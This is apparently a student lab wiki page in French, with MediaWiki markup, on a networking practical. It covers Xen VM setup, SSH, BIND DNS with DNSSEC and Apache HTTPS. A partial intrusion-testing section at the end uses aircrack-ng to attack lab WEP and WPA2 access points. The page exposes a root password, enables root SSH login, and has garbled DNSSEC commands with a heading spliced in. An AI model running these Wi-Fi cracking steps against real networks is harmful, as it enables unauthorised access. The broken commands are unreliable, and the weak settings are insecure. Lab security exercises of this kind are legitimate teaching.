| &lt;br /&gt;
| :: :F3&lt;br /&gt;
| :: :F3&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO 531 INTERCO-SA&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.40/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E304&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.42/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E306&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.43/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO SR53&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.44/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv4 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv4 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv6 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv6 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Configuration des Machines Virtuelles =&lt;br /&gt;
&lt;br /&gt;
On se connecte en ssh à capbreton :&lt;br /&gt;
 ssh root@capbreton&lt;br /&gt;
&lt;br /&gt;
Nous incluons le proxy de polytech dans nos variables d'environnement:&lt;br /&gt;
 export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
&lt;br /&gt;
Nous procédons ensuite la création de la machine virtuelle, pour cela nous allons saisir les informations suivantes: le nom de la machine (ici Paixdieu), l'adresse IP (--ip) qui nous a été fourni durant la répartition des IP, l'adresse IP du routeur de la salle E306  (--gateway) et le masque du réseau correspondant à un /28 (--netmask) (le /27 étant divisé entre les deux classes), l'emplacement de nos disques virtuels (--dir), le mot de passe de la machine virtuel (---password) puis le type de distribution souhaitée, ici nous avons choisi Debian Bullseye (--dist).&lt;br /&gt;
 xen-create-image --hostname=Paixdieu --ip=193.48.57.177 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé deux LV, chacun de 10 Go sur le groupe de volume de stockage:&lt;br /&gt;
 lvcreate -L10G -n Paixdieu1 storage&lt;br /&gt;
 lvcreate -L10G -n Paixdieu2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les avons formatés au format ext4 de la manière suivante:&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu2&lt;br /&gt;
&lt;br /&gt;
nous modifions ensuite notre fichier &amp;quot;/etc/xen/Paixdieu.cfg&amp;quot; pour préciser l'ajout les volumes logiques Paixdieu1 et Paixdieu2, de plus on ajoute le bridge IMA5sc dans la fonction vif.&lt;br /&gt;
Pour cela on ajoute les lignes suivantes:&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/swap.img,xvda1,w',&lt;br /&gt;
  		  ''''phy:/dev/storage/Paixdieu1,xvda3,w','''&lt;br /&gt;
  		  ''''phy:/dev/storage/Paixdieu2,xvda4,w''''&lt;br /&gt;
              ]&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Physical volumes&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Hostname&lt;br /&gt;
 #&lt;br /&gt;
 name        = 'Paixdieu'&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.177 ,mac=00:16:3E:95:13:AE ,'''bridge=IMA5sc'''' ]&lt;br /&gt;
&lt;br /&gt;
Nous lancons la machine virtuelle:&lt;br /&gt;
 xl create -c /etc/xen/Paixdieu.cfg&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les répertoires liés à xvda3 et vxda4 pour y placer /home et /var:&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Nous y déplaçons le répertoire /var/ dans xvda4:&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour monter les disques, nous modifions les lignes suivantes dans /etc/fstab:&lt;br /&gt;
 proc            /proc           proc    defaults        0       0&lt;br /&gt;
 devpts          /dev/pts        devpts  rw,noexec,nosuid,gid=5,mode=620 0  0&lt;br /&gt;
 /dev/xvda1 none swap sw 0 0&lt;br /&gt;
 /dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1&lt;br /&gt;
 '''/dev/xvda3 /home ext4 defaults 0 2'''&lt;br /&gt;
 '''/dev/xvda4 /var ext4 defaults 0 2'''&lt;br /&gt;
&lt;br /&gt;
Puis nous lancons la commande de montage:&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
Nous obtenons les partitions suivantes:&lt;br /&gt;
 '''lsblk'''&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 '''xvda3 202:3 0 10G 0 disk /home'''&lt;br /&gt;
 '''xvda4 202:4 0 10G 0 disk /var'''&lt;br /&gt;
&lt;br /&gt;
Pour finir nous activons l'IPv6 dans l'interface en ajoutant les lignes suivantes dans /etc/network/interfaces:&lt;br /&gt;
 # This file describes the network interfaces available on your system&lt;br /&gt;
 # and how to activate them. For more information, see interfaces(5).&lt;br /&gt;
  &lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
 auto lo&lt;br /&gt;
 iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.177&lt;br /&gt;
 gateway 193.48.57.190&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 '''iface eth0 inet6 auto''' &lt;br /&gt;
 &lt;br /&gt;
 # post-up  ethtool -K eth0 tx off&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 # The commented out line above will disable TCP checksumming which&lt;br /&gt;
 # might resolve problems for some users.  It is disabled by default&lt;br /&gt;
&lt;br /&gt;
Nous effectuons les commandes suivantes pour appliquer les changements:&lt;br /&gt;
 systemctl restart networking&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
Et nous obtenons les résultats comme ça:&lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
    inet 127.0.0.1/8 scope host lo&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 ::1/128 scope host &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UP group default qlen 1000&lt;br /&gt;
    link/ether 00:16:3e:95:13:ae brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
    inet 193.48.57.177/28 brd 193.48.57.191 scope global eth0&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 2001:7a8:116e:60b0:216:3eff:fe95:13ae/64 scope global dynamic mngtmpaddr &lt;br /&gt;
       valid_lft 2591995sec preferred_lft 604795sec&lt;br /&gt;
    inet6 fe80::216:3eff:fe95:13ae/64 scope link &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons la VM avec '''CTRL + ['''&lt;br /&gt;
&lt;br /&gt;
Pour y retourner:&lt;br /&gt;
 xen console Paixdieu&lt;br /&gt;
&lt;br /&gt;
Pour retourner sur sa machine virtuelle, il faut : &lt;br /&gt;
&lt;br /&gt;
- retourner sur capbreton&lt;br /&gt;
 ssh root@capbreton&lt;br /&gt;
- Relancer la VM (login : root | password : glopglopglop):&lt;br /&gt;
 xl create -c /etc/xen/Paixdieu.cfg&lt;br /&gt;
&lt;br /&gt;
Nous avons configuré la résolution de noms dans /etc/network/interfaces, en ajoutons la ligne suivante :&lt;br /&gt;
 # This file describes the network interfaces available on your system&lt;br /&gt;
 # and how to activate them. For more information, see interfaces(5).&lt;br /&gt;
  &lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
 auto lo&lt;br /&gt;
 iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.177&lt;br /&gt;
 gateway 193.48.57.190&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 '''dns-nameservers 8.8.8.8 8.8.4.4'''&lt;br /&gt;
 iface eth0 inet6 auto&lt;br /&gt;
&lt;br /&gt;
Puis nous avons vérifié son fonctionnement à l'aide d'un :&lt;br /&gt;
 ping www.google.com&lt;br /&gt;
 ...&lt;br /&gt;
 --- www.google.com ping statistics ---&lt;br /&gt;
 5 packets transmitted, 5 received, 0% packet loss, time 4005ms&lt;br /&gt;
&lt;br /&gt;
==Configuration du SSH== &lt;br /&gt;
&lt;br /&gt;
Dans /etc/ssh/sshd_config, ajout des lignes :&lt;br /&gt;
 Port 2223&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Puis :&lt;br /&gt;
 &amp;gt; systemctl restart ssh&lt;br /&gt;
 &amp;gt; systemctl status ssh&lt;br /&gt;
 ssh.service - OpenBSD Secure Shell server&lt;br /&gt;
     Loaded: loaded (/lib/systemd/system/ssh.service; enabled; vendor preset: e&amp;gt;&lt;br /&gt;
     Active: active (running) since Mon 2021-11-29 14:47:49 UTC; 2s ago&lt;br /&gt;
       Docs: man:sshd(8)&lt;br /&gt;
             man:sshd_config(5)&lt;br /&gt;
    Process: 3679 ExecStartPre=/usr/sbin/sshd -t (code=exited, status=0/SUCCESS)&lt;br /&gt;
   Main PID: 3680 (sshd)&lt;br /&gt;
      Tasks: 1 (limit: 230)&lt;br /&gt;
     Memory: 1.3M&lt;br /&gt;
        CPU: 21ms&lt;br /&gt;
     CGroup: /system.slice/ssh.service&lt;br /&gt;
             `-3680 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups&lt;br /&gt;
&lt;br /&gt;
Puis nous testons le SSH depuis le terminal de la Zabeth :&lt;br /&gt;
 &amp;gt; ssh root@193.48.57.177 -p 2223&lt;br /&gt;
 password : glopglopglop&lt;br /&gt;
&lt;br /&gt;
Nous arrivons à nous connecter, la configuration du SSh est donc un succès.&lt;br /&gt;
&lt;br /&gt;
==Configuration du DNS==&lt;br /&gt;
&lt;br /&gt;
On a installé le package bind9 :&lt;br /&gt;
 &amp;gt;apt install bind9&lt;br /&gt;
&lt;br /&gt;
Sur le site gandit.net, nous avons modifié : &lt;br /&gt;
&lt;br /&gt;
Fenêtre Glue Records : ns1.paixdieu.site | 193.48.57.177&lt;br /&gt;
&lt;br /&gt;
Fenêtre Serveurs de noms :&lt;br /&gt;
&lt;br /&gt;
DNS Primaire : ns1.paixdieu.site | DNS Secondaire : ns6.gandi.net&lt;br /&gt;
Note : Après avoir constaté que le serveur secondaire ne se mettait pas à jour après chaque &amp;quot;notify&amp;quot; du serveur primaire, nous avons finalement choisi d'utiliser le serveur ns1.belle-rose.site en tant que serveur secondaire. &lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/resolv.conf, ajout de la ligne :&lt;br /&gt;
 nameserver 127.0.0.1&lt;br /&gt;
Afin de configurer le DNS par defaut.&lt;br /&gt;
&lt;br /&gt;
Puis nous passons à la configuration du DNS primaire :&lt;br /&gt;
On ajoute donc une zone lié à notre domaine paixdieu.site de type master et le chemin de son fichier de configuration et on permet les transferts d'informations avec le DNS secondaire ns6.gandi.net.&lt;br /&gt;
&lt;br /&gt;
On ajoute donc les lignes suivantes dans /etc/bind/named.conf.local:&lt;br /&gt;
 &amp;gt;vim /etc/bind/named.conf.local&lt;br /&gt;
 &lt;br /&gt;
 zone &amp;quot;paixdieu.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.paixdieu.site&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Nous avons séparés configuration des serveurs autorisés à dupliqué nos zones de la config de nos zones en insérant les acl suivantes dans le fichier /etc/bind/named.conf. &lt;br /&gt;
&lt;br /&gt;
 options {&lt;br /&gt;
	 directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
	 dnssec-validation auto;&lt;br /&gt;
 	 dnssec-enable yes;&lt;br /&gt;
	 dnssec-lookaside auto;&lt;br /&gt;
	 listen-on-v6 { any; };&lt;br /&gt;
	 allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
   217.70.177.40; //@ de ns6.gandi.net mais plus utilisé au final&lt;br /&gt;
   193.48.57.181; //@ de ns1.belle-rose.site&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Puis nous configurons la zone paixdieu.site, pour cela on ajoute les ns.&lt;br /&gt;
On ajoute les lignes suivantes dans /etc/bind/db.paixdieu.site:&lt;br /&gt;
 &amp;gt;vim /etc/bind/db.paixdieu.site&lt;br /&gt;
 @       IN      SOA     ns1.paixdieu.site. postmaster.paixdieu.site. (&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.paixdieu.site.&lt;br /&gt;
 @       IN      NS      ns1.belle-rose.site.&lt;br /&gt;
 ns1     IN      A       193.48.57.177&lt;br /&gt;
 www     IN      A       193.48.57.177&lt;br /&gt;
&lt;br /&gt;
Pour tester le bon fonctionnement du serveur DNS, nous utilisons la commande :&lt;br /&gt;
&lt;br /&gt;
 &amp;gt;host -t any paixdieu.site localhost&lt;br /&gt;
&lt;br /&gt;
Résultat, cela fonctionne bien :&lt;br /&gt;
&lt;br /&gt;
 Using domain server:&lt;br /&gt;
 Name: localhost&lt;br /&gt;
 Address: 127.0.0.1#53&lt;br /&gt;
 Aliases: &lt;br /&gt;
 paixdieu.site has SOA record ns1.paixdieu.site. postmaster.paixdieu.site. 4 604800 86400 2419200 604800&lt;br /&gt;
 paixdieu.site name server ns1.belle-rose.site.&lt;br /&gt;
 paixdieu.site name server ns1.paixdieu.site.&lt;br /&gt;
&lt;br /&gt;
==HTTPS / Certificat SSL==&lt;br /&gt;
Nous avons ensuite procéder à la création des certificats SSL.&lt;br /&gt;
Nous sommes donc aller sur Gandi, acheter un certificat.&lt;br /&gt;
Pour cela nous avons généré un CSR avec la commande :&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout paixdieu.site.key -out paixdieu.site.csr&lt;br /&gt;
&lt;br /&gt;
-newkey tsa:2048 permet de générer une requête CSR et une clé privée utilisant le chiffrement RSA sur 2048 bits.&lt;br /&gt;
&lt;br /&gt;
-keyout paixdieu.site.key permet de sauvegarder le fichier de clé privée sous le nom &amp;quot;paixdieu.site.key&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
-out paixdieu.csr permet de sauvegarder le fichier CSR sous le nom &amp;quot;paixdieu.csr&amp;quot;. &lt;br /&gt;
&lt;br /&gt;
Lors du paramètrage, nous avons bien fait attention à rentrer &amp;quot;paixdieu.site&amp;quot; comme common name pour que le certificat soit validé par gandi.&lt;br /&gt;
Cela se fait en copant le contenu de paixdieu.site.csr dans la fenêtre correspondante lors de l'achat du certificat.&lt;br /&gt;
&lt;br /&gt;
Afin de bien sauvegarder les fichiers utilisés, nous les avvons sauvegarder dans le dossier suivant:&lt;br /&gt;
 ~/save_dns/paixdieu.site.csr&lt;br /&gt;
 ~/save_dns/paixdieu.site.key&lt;br /&gt;
&lt;br /&gt;
'''4.4 Sécurisation de serveur DNS par DNSSEC'''&lt;br /&gt;
&lt;br /&gt;
Activer DNSSEC&lt;br /&gt;
&lt;br /&gt;
Dans /etc/bind/named.conf.options on ajoute les lignes :&lt;br /&gt;
 dnssec-validation yes;&lt;br /&gt;
 dnssec-enable yes;&lt;br /&gt;
 dnssec-lookaside auto;&lt;br /&gt;
&lt;br /&gt;
On crée un répertoire /etc/bind/paixdieu.site.dnssed/&lt;br /&gt;
On crée la clef asymétrique de signature de clefs de zone &lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZO'''4.4 Sécurisation de serveur DNS par DNSSEC'''NE paixdieu.site&lt;br /&gt;
On crée la clef asymétrique de la zone pour signer les enregistrements&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -n ZONE paixdieu.site&lt;br /&gt;
&lt;br /&gt;
On renomme les clés :&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ensuite, on crée la clé asymétrique de la zone pour signer les enregistrements :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -n ZONE paixdieu.site&lt;br /&gt;
&lt;br /&gt;
On renomme les clés :&lt;br /&gt;
 mv Kpaixdieu.site.+005+17429.key paixdieu.site-ksk.key&lt;br /&gt;
 mv Kpaixdieu.site.+005+17429.private paixdieu.site-ksk.private&lt;br /&gt;
 mv Kpaixdieu.site.+005+28633.key paixdieu.site-zsk.key&lt;br /&gt;
 mv Kpaixdieu.site.+005+28633.private paixdieu.site-zsk.private&lt;br /&gt;
&lt;br /&gt;
On les inclue à la suite de /etc/bind/db.paixdieu.site&lt;br /&gt;
 $include /etc/bind/paixdieu.site.dnssec/paixdieu.site-ksk.key&lt;br /&gt;
 $include /etc/bind/paixdieu.site.dnssec/paixdieu.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
Puis incrémente le numéro de série (5=&amp;gt;6)&lt;br /&gt;
&lt;br /&gt;
On signe des enregistrements de la zone&lt;br /&gt;
 dnssec-signzone -o paixdieu.site -k paixdie'''4.4 Sécurisation de serveur DNS par DNSSEC'''u.site-ksk ../db.paixdieu.site paixdieu.site-zsk&lt;br /&gt;
&lt;br /&gt;
Prise en compte du fichier signé&lt;br /&gt;
  &lt;br /&gt;
On modifie le fichier /etc/bind/named.conf.local de la manière suivante :&lt;br /&gt;
 zone &amp;quot;paixdieu.site&amp;quot; {&lt;br /&gt;
	type master;&lt;br /&gt;
	file &amp;quot;/etc/bind/db.paixdieu.site.signed&amp;quot;;&lt;br /&gt;
	allow-transfer {217.70.177.40; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Pour finir, nous allons sur gandi.net, sur notre nom de domaine dans DNSSEC et nous ajoutons les deux clefs (zsk et ksk avec l'algorithme 5 (RSA/SHA-1).&lt;br /&gt;
Et nous vérifions la bon fonctionnement du DNSSEC de la manière suivante :&lt;br /&gt;
 &amp;gt; dnssec-verify -o paixdieu.site db.paixdieu.site.signed&lt;br /&gt;
&lt;br /&gt;
 Loading zone 'paixdieu.site' from file 'db.paixdieu.site.signed'&lt;br /&gt;
&lt;br /&gt;
 Verifying the zone using the following algorithms:&lt;br /&gt;
 - RSASHA1&lt;br /&gt;
 Zone fully signed:&lt;br /&gt;
 Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                     ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
&lt;br /&gt;
'''4.3 Sécurisation de site web par certificat'''&lt;br /&gt;
&lt;br /&gt;
On active le module SSL&lt;br /&gt;
 a2enmod ssl&lt;br /&gt;
&lt;br /&gt;
On configure le port 443 pour l'HTTPS en remplaçant dans le fichier ''/etc/apache2/ports.conf'' :&lt;br /&gt;
 Listen 80&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
        Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
par&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;IfModule mod_ssl.c&amp;gt;&lt;br /&gt;
         Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On place paixdieu.site.key /etc/ssl/private/ et paixdieu.site.crt /etc/ssl/certs/&lt;br /&gt;
&lt;br /&gt;
On crée les liens symboliques pour les certificats&lt;br /&gt;
&lt;br /&gt;
 &amp;gt; c_rehash /etc/ssl/certs&lt;br /&gt;
 Doing /etc/ssl/certs&lt;br /&gt;
 WARNING: Skipping duplicate certificate ca-certificates.crt&lt;br /&gt;
 WARNING: Skipping duplicate certificate ca-certificates.crt&lt;br /&gt;
&lt;br /&gt;
On cofigure apache en ajoutant la ligne suivante dans le fichier /etc/apache2/apache2.conf :&lt;br /&gt;
 ServerName paixdieu.site&lt;br /&gt;
&lt;br /&gt;
On crée le fichier de configuration custom /etc/apache2/sites-available/000-paixdieu.site-ssl.conf :&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
         ServerName paixdieu.site&lt;br /&gt;
         ServerAlias www.paixdieu.site&lt;br /&gt;
 	ServerAdmin webmaster@localhost&lt;br /&gt;
         DocumentRoot /var/www/html &lt;br /&gt;
 	Redirect permanent / https://paixdieu.site/&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
  &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
 	ServerAdmin webmaster@localhost&lt;br /&gt;
 	ServerName paixdieu.site&lt;br /&gt;
 	ServerAlias www.paixdieu.site&lt;br /&gt;
 	DocumentRoot /var/www/html&lt;br /&gt;
 	SSLEngine on&lt;br /&gt;
 	SSLCertificateFile /etc/ssl/certs/paixdieu.site.crt&lt;br /&gt;
 	SSLCertificateKeyFile /etc/ssl/private/paixdieu.site.key&lt;br /&gt;
 	ErrorLog ${APACHE_LOG_DIR}/error.log&lt;br /&gt;
 	CustomLog ${APACHE_LOG_DIR}/access.log combined&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous activons le site ssl : &lt;br /&gt;
 a2ensite 000-paixdieu.site-ssl&lt;br /&gt;
&lt;br /&gt;
Nous arrivons bien à nous connecter à https://www.paixdieu.site&lt;br /&gt;
Et un test avec openssl nous renvoie le résultat suivant :&lt;br /&gt;
&lt;br /&gt;
 CONNECTED(00000003)&lt;br /&gt;
 Can't use SSL_get_servername&lt;br /&gt;
 depth=0 CN = paixdieu.site&lt;br /&gt;
 verify error:num=20:unable to get local issuer certificate&lt;br /&gt;
 verify return:1&lt;br /&gt;
 depth=0 CN = paixdieu.site&lt;br /&gt;
 verify error:num=21:unable to verify the first certificate&lt;br /&gt;
 verify return:1&lt;br /&gt;
 depth=0 CN = paixdieu.site&lt;br /&gt;
 verify return:1&lt;br /&gt;
 ---&lt;br /&gt;
 Certificate chain&lt;br /&gt;
 0 s:CN = paixdieu.site&lt;br /&gt;
   i:C = FR, ST = Paris, L = Paris, O = Gandi, CN = Gandi Standard SSL CA 2&lt;br /&gt;
 ---&lt;br /&gt;
 Server certificate&lt;br /&gt;
 -----BEGIN CERTIFICATE-----&lt;br /&gt;
 [...]&lt;br /&gt;
 -----END CERTIFICATE-----&lt;br /&gt;
 subject=CN = paixdieu.site&lt;br /&gt;
 issuer=C = FR, ST = Paris, L = Paris, O = Gandi, CN = Gandi Standard SSL CA 2&lt;br /&gt;
 ---&lt;br /&gt;
&lt;br /&gt;
= Architecture réseau =&lt;br /&gt;
&lt;br /&gt;
== L'architecture générale ==&lt;br /&gt;
[[Fichier:Pra diagrams.png]]&lt;br /&gt;
&lt;br /&gt;
== Les réseaux virtuels ==&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv4) ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv6) ==&lt;br /&gt;
[insérer résumé]&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
'''5.2 Cassage de clef WEP d’un point d’accès WiFi'''&lt;br /&gt;
&lt;br /&gt;
Pendant que l'infrastructure réseau était en train d'être configurée, nous avons testé de casser une clé wep.&lt;br /&gt;
&lt;br /&gt;
Commandes réalisées sur un eeePC sous Linux :&lt;br /&gt;
&lt;br /&gt;
Récupération du nom de l'interface réseau WiFi du eeePC:&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
On trouve : '''wlx40a5ef0f68cb'''&lt;br /&gt;
&lt;br /&gt;
Mettre la carte réseau WiFi en mode monitor sur le channel 4:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f68cb 4&lt;br /&gt;
&lt;br /&gt;
Après cette étape, il est possible que la carte réseau soit renommée par airmon-ng en wlan0mon.&lt;br /&gt;
&lt;br /&gt;
Vérification que celle-ci est bien en mode monitor :&lt;br /&gt;
&lt;br /&gt;
 iwconfig&lt;br /&gt;
&lt;br /&gt;
Ecouter les beacon WiFi sur cette carte réseau :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
De cette écoute , nous choisissons l'AP nommé '''cracotte09'''  avec le BSSID  : '''04:DA:D2:9C:50:58'''&lt;br /&gt;
&lt;br /&gt;
Nous simulons l'authentification sur cet AP :&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte09 -a 04:DA:D2:9C:50:58' wlan0mon&lt;br /&gt;
&lt;br /&gt;
 -9 : mode injection&lt;br /&gt;
 -e cracotte09 : nom du point d'accès&lt;br /&gt;
 -a 04:DA:D2:9C:50:58 : bssid du point d'accès&lt;br /&gt;
&lt;br /&gt;
Nous récupérons ensuite un nombre de frames conséquent émis par cet access point :&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte09 -a 04:DA:D2:9C:50:58 -h 40:A5:EF:01:28:D0 wlan0mon&lt;br /&gt;
&lt;br /&gt;
-1 : mode &amp;quot;fake authentification&amp;quot;&lt;br /&gt;
0 : délai entre les demandes d'authentifications&lt;br /&gt;
-h 40:A5:EF:01:27:D0 : bssid de l'interface réseau&lt;br /&gt;
&lt;br /&gt;
Résultat :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Key_name.png|center|thumb|500px|Branchements duu eeee PC]]&lt;br /&gt;
&lt;br /&gt;
'''5.3 Cassage de clef WPA2-PSK d’un point d’accès WiFi'''&lt;br /&gt;
&lt;br /&gt;
Maintenant nous choisissions kracotte5 comme victime à l'aide du groupe de commande précédentes, c'est à dire :&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f68cb 4&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
Une fois que nous avons trouvé la victime (kracotte 5 ainsi que son BSSID), nous tentons de récupérer un handshake provenant de ce point d'accès et nous le stockons dans un fichier psk :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 --bssid 44:AD:D9:5F:87:04 -w psk wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous installons ensuite un utilitaire pour générer le dictionnaire de clé WPA2-PSK qui sera utilisé par aircrack-ng pour se connecter au point d'accès wifi kracotte5 :&lt;br /&gt;
&lt;br /&gt;
